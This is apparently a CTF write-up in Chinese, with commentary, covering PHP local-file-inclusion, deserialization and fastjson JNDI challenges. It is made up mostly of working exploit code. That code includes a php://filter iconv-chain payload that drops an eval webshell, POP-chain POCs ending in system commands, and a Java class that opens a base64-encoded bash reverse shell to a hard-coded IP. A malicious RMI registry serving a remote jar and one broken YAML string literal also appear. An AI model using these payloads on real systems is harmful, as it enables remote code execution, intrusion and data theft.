rce_me

hxp CTF 2021 - The End Of LFI? - 跳跳糖 (tttang.com)

exp:

<?php
// Generator for a php://filter "iconv chain" (technique from the hxp CTF 2021
// "The End Of LFI?" writeup linked above). Defender's summary: given only a
// file-inclusion sink (include/require on a user-controlled path) and PHP's
// built-in stream filters, the included stream can be made to begin with
// attacker-chosen bytes; php://filter needs no allow_url_include. The fix is
// at the sink: allowlist the includable names and reject any input carrying a
// scheme ("php://", "data://", ...).
//
// Base64 (padding stripped) of the short PHP stub that ends up at the front of
// the included stream. Every character below must have an entry in
// $conversions, which is why that table contains exactly these keys.
$base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4";
// Each entry is a pipe-separated iconv sequence that, per the linked writeup,
// makes the character used as its key appear at the front of a base64 stream.
// The sequences are empirical; the order of steps inside each must not change.
$conversions = array(
'R' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
'B' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C' => 'convert.iconv.UTF8.CSISO2022KR',
'8' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'f' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
's' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
'z' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
'U' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'P' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
'V' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
'0' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'Y' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
'W' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
'd' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'D' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'7' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'4' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
);

// First step base64-encodes the target resource so the stream is plain ASCII
// that the iconv steps can act on.
$filters = "convert.base64-encode|";
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
$filters .= "convert.iconv.UTF8.UTF7|";

// The string is walked in reverse because each iteration prepends one
// character; after the last iteration the stream starts with $base64_payload.
foreach (str_split(strrev($base64_payload)) as $c) {
$filters .= $conversions[$c] . "|";
// Decode/re-encode normalises the stream back to clean base64 before the next
// prepend; the UTF7 step again removes '=' padding (see the note above).
$filters .= "convert.base64-decode|";
$filters .= "convert.base64-encode|";
$filters .= "convert.iconv.UTF8.UTF7|";
}
// Final decode turns the accumulated base64 into the raw bytes PHP will parse.
$filters .= "convert.base64-decode";

// The resource here is a throwaway data:// URI for local testing; the request
// shown further down substitutes a real file path, whose content then follows
// the injected stub as trailing (largely garbage) data.
$final_payload = "php://filter/{$filters}/resource=data://,aaaaaaaaaaaaaaaaaaaa";
echo ($final_payload);

payload:

?file=php%3A%2F%2Ffilter%2Fconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EEUCTW%7Cconvert%2Eiconv%2EL4%2EUTF8%7Cconvert%2Eiconv%2EIEC%5FP271%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL7%2ENAPLPS%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EUCS%2D2LE%2EUCS%2D2BE%7Cconvert%2Eiconv%2ETCVN%2EUCS2%7Cconvert%2Eiconv%2E857%2ESHIFTJISX0213%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EEUCTW%7Cconvert%2Eiconv%2EL4%2EUTF8%7Cconvert%2Eiconv%2E866%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL3%2ET%2E61%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2ESJIS%2EGBK%7Cconvert%2Eiconv%2EL10%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2EISO%2DIR%2D111%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2EISO%2DIR%2D111%2EUJIS%7Cconvert%2Eiconv%2E852%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Denc
ode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUTF16%2EEUCTW%7Cconvert%2Eiconv%2ECP1256%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL7%2ENAPLPS%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2E851%2EUTF8%7Cconvert%2Eiconv%2EL7%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2ECP1133%2EIBM932%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EUCS%2D2LE%2EUCS%2D2BE%7Cconvert%2Eiconv%2ETCVN%2EUCS2%7Cconvert%2Eiconv%2E851%2EBIG5%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EUCS%2D2LE%2EUCS%2D2BE%7Cconvert%2Eiconv%2ETCVN%2EUCS2%7Cconvert%2Eiconv%2E1046%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUTF16%2EEUCTW%7Cconvert%2Eiconv%2EMAC%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL7%2ESHIFTJISX0213%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUTF16%2EEUCTW%7
Cconvert%2Eiconv%2EMAC%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2EISO%2DIR%2D111%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EISO6937%2EJOHAB%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EL6%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2EUTF16LE%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EUCS2%2EUTF8%7Cconvert%2Eiconv%2ESJIS%2EGBK%7Cconvert%2Eiconv%2EL10%2EUCS2%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Eiconv%2EUTF8%2ECSISO2022KR%7Cconvert%2Eiconv%2EISO2022KR%2EUTF16%7Cconvert%2Eiconv%2EUCS%2D2LE%2EUCS%2D2BE%7Cconvert%2Eiconv%2ETCVN%2EUCS2%7Cconvert%2Eiconv%2E857%2ESHIFTJISX0213%7Cconvert%2Ebase64%2Ddecode%7Cconvert%2Ebase64%2Dencode%7Cconvert%2Eiconv%2EUTF8%2EUTF7%7Cconvert%2Ebase64%2Ddecode%2Fresource%3D/etc/passwd&0=echo '%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e' %3e a.php

蚁剑连a.php,然后就是suid提权,直接date提权就好了

step_by_step-v3

源码:

<?php
// Silencing all diagnostics also hides the notices/warnings an abused gadget
// chain would otherwise leave behind; in production keep error_reporting on
// (with display_errors off) so such activity is at least logged.
error_reporting(0);
class yang
{
public $y1;

// Only runs for `new yang()`, never on unserialize(), so it plays no part in
// the deserialization chain.
public function __construct()
{
$this->y1->magic();
echo 1;
}

// PHP method names are case-insensitive, so this is the __toString hook: it
// runs when a yang object is used as a string (print/echo) and then calls
// whatever $y1 holds — a string value means calling the function of that name.
public function __tostring()
{
($this->y1)();
}

// File-inclusion sink: $_GET['file'] reaches include_once() after a single
// regex check whose pattern ($hey_mean_then) is defined in hint.php and not
// visible here. This is a denylist, so its strength is entirely that pattern;
// an allowlist of includable names would be the robust fix.
public function hint()
{
include_once('hint.php');
if(isset($_GET['file']))
{
$file = $_GET['file'];
if(preg_match("/$hey_mean_then/is", $file))
{
die("nonono");
}
include_once($file);
}
}
}

class cheng
{
public $c1;

// Runs automatically after unserialize() rebuilds the object. Writing a
// property on $c1 triggers __set() when $c1 is an object that does not
// declare that property (bei below declares no $flag).
public function __wakeup()
{
$this->c1->flag = 'flag';
}

// Reached when a cheng object is invoked like a function; calls hint() on
// $c1, which for an object without hint() lands in its __call().
public function __invoke()
{
$this->c1->hint();
}
}

class bei
{
public $b1;
public $b2;

// Fires on a write to an undeclared/inaccessible property. Printing $b1
// converts it to a string, so an object in $b1 has its __toString() run.
public function __set($k1,$k2)
{
print $this->b1;
}

// Fires on a call to an undefined method; same string conversion of $b1.
public function __call($n1,$n2)
{
echo $this->b1;
}
}

// Deserialization entry point; in the deployed challenge the argument is
// presumably request-controlled (shown empty here). Hardening: do not feed
// untrusted bytes to unserialize() at all — prefer json_decode() — or at the
// very least pass ['allowed_classes' => false] (or an explicit allowlist) so
// no class with magic methods can be instantiated from the payload.
unserialize('');

?>

反序列化poc:

<?php

// Stub mirroring the target's class name and public properties. serialize()
// records only the class name and property values, so none of the target's
// methods need to be reproduced here.
class yang
{
public $y1;
public function __construct()
{
// $this->y1 = new bei();
// (unused; the object graph is wired at the bottom of the script instead)
}

}

// Stub for the target's cheng; this is the outermost object of the payload
// because its __wakeup() on the target starts the chain.
class cheng
{
public $c1;
public function __construct()
{

}

}

// Stub for the target's bei; $b2 is declared only so the property layout
// matches, it is never set.
class bei
{
public $b1;
public $b2;

public function __construct()
{
// $this->b2 = new yang();
// (unused; see the wiring at the bottom of the script)

}
}

$a = new yang();
$b = new cheng();
$c = new bei();

// Object graph: cheng->c1 = bei, bei->b1 = yang, yang->y1 = "phpinfo".
// On the target, unserialize() of the result runs cheng::__wakeup, whose
// write to $c1->flag hits bei::__set (bei has no $flag); its `print $this->b1`
// hits yang::__tostring, which calls the string held in $y1 as a function.
$b->c1 = $c;
$c->b1 = $a;
$a->y1 = "phpinfo";

echo serialize($b);

?>

flag在phpinfo里


Safepop

源码:

<?php
// Gadget: with the default $func, a call to any undefined method on a Fun
// becomes call_user_func_array($f, $p), i.e. an arbitrary function call.
class Fun{
private $func = 'call_user_func_array';
// __call fires for undefined methods; $f is the method name, $p its args.
public function __call($f,$p){
call_user_func($this->func,$f,$p);
}
// Guard meant to neutralise deserialized instances; it runs after
// unserialize() has rebuilt the object. The POC below nevertheless serializes
// a Fun whose $func is 'system'; how this guard is avoided on the deployed
// challenge is not shown on this page.
public function __wakeup(){
$this->func = '';
die("Don't serialize me");
}
}

class Test{
// Direct command sink with a fixed argument ('?' is a shell wildcard); it is
// only reachable if something calls getFlag() on a Test.
public function getFlag(){
system("cat /flag?");
}
// Undefined-method fallback; no command execution here.
public function __call($f,$p){
phpinfo();
}
public function __wakeup(){
echo "serialize me?";
}
}

class A{
public $a;
// Fires when an undeclared/inaccessible property is read on an A. The check
// is a denylist on the class name "Test" only: any other object in $a (a Fun,
// for instance) passes, and the requested property name is then used as a
// method name, so a missing method lands in that object's __call(). A robust
// check would test `$this->a instanceof` an expected type instead of a regex.
public function __get($p){
if(preg_match("/Test/",get_class($this->a))){
return "No test in Prod\\n";
}
return $this->a->$p();
}
}

class B{
public $p;
// Runs when the object is released. B does not declare $a, so it is a
// dynamic property (deprecated since PHP 8.2) that a serialized B can still
// carry; reading $this->a->$p then reaches that object's __get() with the
// value of $p as the property name.
public function __destruct(){
$p = $this->p;
echo $this->a->$p;
}
}

// Deserialization entry point (argument presumably request-controlled in the
// deployed challenge). Every class above carries a magic method, which is
// exactly what makes unserialize() on untrusted input dangerous; use
// json_decode(), or at least ['allowed_classes' => false].
unserialize('');

poc:

<?php
// Stub matching the target's Fun. The property must stay private so its
// serialized name ("\0Fun\0func") matches the target's declaration; __wakeup
// is deliberately omitted because only property data is serialized.
class Fun{
private $func;
public function __construct()
{
$this->func = 'system';
}

}

// Declared for completeness; the Test instance built below is never attached
// to the object graph.
class Test{
public function __construct()
{

}
}

// Stub for the target's A; $a will hold the Fun instance.
class A{
public $a;
public function __construct()
{

}
}

// Stub for the target's B: the outermost object, since its __destruct() on
// the target starts the chain. Only $p is declared; $a is added dynamically.
class B{
public $p;
public function __construct()
{

}
}

$a = new A();
$b = new B();
$fun = new Fun();
// Created but never wired in: A::__get() on the target rejects a Test in $a
// by class name, so Fun is used instead.
$test = new Test();
$a->a = $fun;
// The property *name* read in B::__destruct doubles as the command string:
// B::__destruct -> A::__get('cat /f*') -> Fun::__call('cat /f*', [])
// -> call_user_func('system', 'cat /f*', []).
$b->p = 'cat /f*';
// Dynamic property on B (B declares only $p); serialize() emits it anyway.
$b->a = $a;
// urlencode() because Fun's private property name contains NUL bytes that
// would not survive a raw query string.
echo urlencode(serialize($b));

flag:

flag{55410055464485123619498041307525}

simple_json

fastjson1.2.83

<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.apache.tomcat.embed</groupId>
<artifactId>tomcat-embed-el</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.83</version>
</dependency>

题目给的类似的payload:

{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"ldap://ip:port/Exp"}, "msg":{"$ref":"$.content.context"}}

各种信息搜集之后:

没有ELProcessor的时候: https://tttang.com/archive/1405/#toc_snakeyaml

Yaml反序列化: https://www.yuque.com/jinjinshigekeaigui/qskpi5/rgwdc7#wpl31

由此先创建一个Exp恶意类,用于RCE,还有META-INF/services/javax.script.ScriptEngineFactory 文件,内容为Exp ,然后编译Exp类,生成jar包一起放到vps上


用python开启服务:

python3 -m http.server --bind 0.0.0.0 8888

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

/**
 * Payload class for the SnakeYAML {@code ScriptEngineManager} gadget used further down.
 *
 * <p>How it is reached (defender's view): the YAML string in the RMI server's
 * {@code tomcat_snakeyaml()} builds a {@code ScriptEngineManager} over a
 * {@code URLClassLoader} that points at the attacker-hosted jar. {@code ScriptEngineManager}
 * uses {@link java.util.ServiceLoader} to instantiate every
 * {@code META-INF/services/javax.script.ScriptEngineFactory} provider visible to that
 * loader — which is why the jar must also carry that service file naming {@code Exp}.
 * Instantiation alone runs the static initializer; none of the interface methods are
 * ever needed, so they all return {@code null}.
 *
 * <p>Detection / mitigation: a JVM spawning {@code bash -c} with a
 * {@code {echo,...}|{base64,-d}|{bash,-i}} pipeline is a high-signal process-tree
 * indicator, as is the JVM fetching classes over plain HTTP (port 8888 here). On the
 * victim side, SnakeYAML must parse untrusted input with {@code SafeConstructor}, and
 * JNDI lookups must never take attacker-influenced names.
 */
public class Exp implements ScriptEngineFactory {

// Executes as soon as ServiceLoader loads and instantiates the class. The base64
// literal is the author's reverse-shell one-liner (the host/port are the same VPS
// used elsewhere in the writeup); the {a,b} brace form avoids literal spaces in the
// exec() argument and is itself a pattern worth alerting on.
static {
try {
System.out.println("Hacked by ameuu");
Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuMi4xNjYvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}");
} catch (IOException e){
e.printStackTrace();
}
}

// Every factory method below returns null: the payload has already run by the
// time any of them could be called, and nothing in the chain invokes them.
@Override
public String getEngineName() {
return null;
}

@Override
public String getEngineVersion() {
return null;
}

@Override
public List<String> getExtensions() {
return null;
}

@Override
public List<String> getMimeTypes() {
return null;
}

@Override
public List<String> getNames() {
return null;
}

@Override
public String getLanguageName() {
return null;
}

@Override
public String getLanguageVersion() {
return null;
}

@Override
public Object getParameter(String key) {
return null;
}

@Override
public String getMethodCallSyntax(String obj, String m, String... args) {
return null;
}

@Override
public String getOutputStatement(String toDisplay) {
return null;
}

@Override
public String getProgram(String... statements) {
return null;
}

@Override
public ScriptEngine getScriptEngine() {
return null;
}

}

本地开启rmi服务,jar打包,放到vps上执行:

package main;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.Reference;
import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * Malicious RMI registry from the writeup: it binds a Tomcat {@code ResourceRef} so that a
 * victim's JNDI lookup of {@code rmi://host:1559/Exploit} is materialised locally by
 * {@code org.apache.naming.factory.BeanFactory} (no remote codebase required). The
 * {@code forceString} entry makes BeanFactory invoke {@code Yaml.load(String)} with the
 * attacker's YAML, which (see {@code Exp}) fetches and instantiates the hosted jar.
 *
 * <p>Defensive notes: this only works if the victim classpath contains both Tomcat's
 * naming factory and SnakeYAML, and newer Tomcat releases removed {@code forceString}
 * support from BeanFactory. The robust fix is on the victim: never perform JNDI lookups
 * with attacker-influenced names, and do not let fastjson's {@code @type} select arbitrary
 * classes (presumably the challenge permits the {@code JNDIService} type here).
 *
 * <p>As printed, the {@code yaml} literal in {@code tomcat_snakeyaml()} does not compile
 * (stray {@code >} after the closing quote and a {@code <...>} wrapper inside the URL) —
 * almost certainly renderer damage to the original writeup. Also note the first payload
 * shown below uses an {@code ldap://} URL against this RMI registry, which likely
 * explains the failed connection the author reports.
 */
public class Main {

// Builds the Reference the registry hands back. The class name selects what
// BeanFactory instantiates (here a SnakeYAML Yaml object); "forceString" tells
// BeanFactory to call the method named in the value ("load") with the string
// stored under property "a".
public static ResourceRef tomcat_snakeyaml(){
ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
true, "org.apache.naming.factory.BeanFactory", null);
String yaml = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\\"<http://82.156.2.166:8888/exp.jar\\"]]]]">;
ref.add(new StringRefAddr("forceString", "a=load"));
ref.add(new StringRefAddr("a", yaml));
return ref;
}

// Starts a registry on rmi_port and binds the reference under the name the
// victim will look up; java.rmi.server.hostname must be the externally
// reachable address or the stub handed to the client points at the wrong host.
public static void main(String[] args) throws Exception {
int rmi_port = 1559;
System.setProperty("java.rmi.server.hostname", "82.156.2.166");
Registry registry = LocateRegistry.createRegistry(rmi_port);
System.out.println(System.getProperty("java.rmi.server.hostname"));

ResourceRef ref = tomcat_snakeyaml();

// ReferenceWrapper makes the Reference exportable through the registry.
ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
registry.bind("Exploit", referenceWrapper);

}
}

然后传入payload

{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"ldap://82.156.2.166:1559/Exploit"}, "msg":{"$ref":"$.content.context"}}

但是没有成功连上,利用别的师傅写的工具,把yaml函数写入工具之后打包,

java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer 82.156.2.166


记得监听端口

最终payload:

{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://82.156.2.166:1097/ExecBySnakeYaml"}, "msg":{"$ref":"$.content.context"}}

拿到flag


little_db在复现中……